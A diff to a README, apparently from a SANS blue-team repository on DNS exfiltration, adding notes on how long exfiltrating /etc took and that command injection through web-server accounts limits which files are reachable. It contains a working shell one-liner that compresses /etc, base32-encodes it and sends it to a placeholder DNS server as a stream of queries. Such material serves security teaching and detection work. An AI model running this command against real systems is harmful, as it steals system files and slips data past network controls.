sans-blue-team/DNS-Exfiltrate/README.md

 ## Exfiltrate a compressed tar archive of a directory:

+Note that exfiltrating /etc on an Ubuntu Linux system worked perfecttly (but took a while).
+It took 35 minutes, requiring 45,382 DNS requests, resulting in a 1.8 megabyte tar.gz file.
+Needless to say: the files/directories contained in the archive are restricted by the permissions of the running user.
+For command injection on web sites (using an account such as apache or www-data), many files/directories will likely be missing.

 ```
 tar czf - /etc | base32 -w 63 |tr -d = | while read a; do dig @<DNS Server> $a.<DNS Server>; done;
 ```